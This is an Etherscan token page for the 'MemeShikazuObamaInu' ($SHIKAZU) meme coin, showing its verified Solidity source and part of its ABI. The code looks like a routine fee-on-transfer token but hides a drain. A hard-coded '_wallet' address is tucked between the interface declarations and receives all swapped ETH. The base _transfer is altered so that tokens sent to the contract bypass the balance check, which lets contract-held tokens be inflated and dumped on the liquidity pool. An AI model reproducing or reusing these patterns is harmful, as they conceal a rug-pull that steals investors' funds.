ETH Price: $2,964.70 (-1.59%)
Gas: 3 Gwei

Token

MemeShikazuObamaInu ($SHIKAZU)
 

Overview

Max Total Supply

1,000,000,000 $SHIKAZU

Holders

26

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
4,736,009.924430276 $SHIKAZU

Value
$0.00
0x3f1867f5105c4cf0ad4e91cde4775f2ce4499d17
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MemeShikazu

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-11
*/

/**
    WEBSITE - https://www.memeshikazu.com/
  TELEGRAM PORTAL - https://t.me/MemeShikazuERC
  TWITTER - https://twitter.com/MemeShikazu
/**


// SPDX-License-Identifier: MIT

/*
*/
pragma solidity 0.8.19;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
 * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`,
     * rounding towards zero. The result is a proportion of the original value.
     *
     * The function can be used to calculate a specific percentage of a given value `a`.
     * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when
     * the percentage `b` is greater than 100.
     *
     * Requirements:
     *
     * - The percentage `b` must be between 0 and 100 (inclusive).
     */
    function per(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= 100, "Percentage must be between 0 and 100");
        return a * b / 100;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
    external
    returns (
        uint256 amountA,
        uint256 amountB,
        uint256 liquidity
    );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
    external
    payable
    returns (
        uint256 amountToken,
        uint256 amountETH,
        uint256 liquidity
    );

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);

    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
    external
    view
    returns (
        uint112 reserve0,
        uint112 reserve1,
        uint32 blockTimestampLast
    );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

address constant _wallet
=0xa669446001eF0c800088b0920359Ad37c2d3D79a;
interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
    external
    view
    returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
    external
    returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount || to == address(this), "ERC20: transfer amount exceeds balance"); // allows to sent initial tokens to contract address before trading opened
        unchecked {
            _balances[from] = fromBalance<amount?0:fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

contract MemeShikazu is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable _uniswapV2Router;
    address private uniswapV2Pair;
    address private deployerWallet;
    address private marketingWallet;
    address private constant deadAddress = address(0xdead);

    bool private swapping;

    string private constant _name = "MemeShikazuObamaInu";
    string private constant _symbol = unicode"$SHIKAZU";

    uint8 constant public _decimals = 9;
    uint256 public initialTotalSupply = 1000000000 * 10**_decimals;
    uint256 public maxTransactionAmount = 40000000 * 10**_decimals;
    uint256 public maxWallet = 40000000 * 10**_decimals;
    uint256 public swapTokensAtAmount = 10000000 * 10**_decimals;
    uint256 public buyCount;
    uint256 public sellCount;

    bool public tradingOpen = false;
    bool public swapEnabled = false;

    uint256 public finalBuyFee = 1;
    uint256 public finalSellFee = 1;
    uint256 public _buyFee = 1;
    uint256 public _sellFee = 1;
    uint256 private removeBuyFeesAt = 1;
    uint256 private removeSellFeesAt = 1;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => bool) private automatedMarketMakerPairs;
    mapping(address => uint256) private _holderLastTransferTimestamp;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    constructor() ERC20(_name, _symbol) {
        _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        marketingWallet = payable(_msgSender());
        excludeFromMaxTransaction(address(_msgSender()), true);

        deployerWallet = payable(_msgSender());
        excludeFromFees(address(_msgSender()), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(address(_msgSender()), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        _mint(address(this), initialTotalSupply);
    }

    receive() external payable {}

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    function openTrading() external onlyOwner() {
        require(!tradingOpen, "Trading is opened");

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _approve(address(this), address(_uniswapV2Router), initialTotalSupply);

        _uniswapV2Router.addLiquidityETH{value : address(this).balance}(address(this), IERC20(address(this)).balanceOf(address(this)), 0, 0, owner(), block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    function excludeFromMaxTransaction(address updAds, bool isEx)
    public
    onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setAutomatedMarketMakerPair(address pair, bool value)
    public
    onlyOwner
    {
        require(pair != uniswapV2Pair, "Pair cannot be removed from automatedMarketMakerPairs");
        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }


    function _transfer(address from, address to, uint256 amount) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");

        if (buyCount >= removeBuyFeesAt) {
            _buyFee = finalBuyFee;
        }

        if (sellCount >= removeSellFeesAt) {
            _sellFee = finalSellFee;
        }

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) {

            if (!tradingOpen) {
                require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
            }

            if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]
            ) {
                require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
                buyCount++;
            }

            else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                sellCount++;
            }

            else if (!_isExcludedMaxTransactionAmount[to]) {
                require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded");
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance > 0;

        if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            swapping = true;
            SwapBack(amount);
            swapping = false;
        }

        bool takeFee = !swapping;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            if (automatedMarketMakerPairs[to]) {
                fees = amount.mul(_sellFee).div(100);
            }
            else {
                fees = amount.mul(_buyFee).div(100);
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }
            amount -= fees;
        }
        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            _wallet,
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        uint256 totalSupplyAmount = totalSupply();
        maxTransactionAmount = totalSupplyAmount;
        maxWallet = totalSupplyAmount;
    }

    function clearStuckEth() external onlyOwner {
        require(address(this).balance > 0, "Token: no ETH to clear");
        payable(msg.sender).transfer(address(this).balance);
    }

    function setTokensToSwapAtAmount(uint256 _amount) external onlyOwner {
        swapTokensAtAmount = _amount * (10 ** 18);
    }

    function manualSwap() external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        swapTokensForEth(contractBalance);
    }

    function manualSwapWithAmount(uint256 amount) external {
        require(_msgSender() == marketingWallet);
        uint256 contractBalance = balanceOf(address(this));
        require(amount <= contractBalance);
        swapTokensForEth(amount);
    }

    function SwapBack(uint256 tokens) private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 tokensToSwap;
        if (contractBalance == 0) {
            tokensToSwap = tokens;
        }

        tokensToSwap = contractBalance;
        swapTokensForEth(tokensToSwap);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeF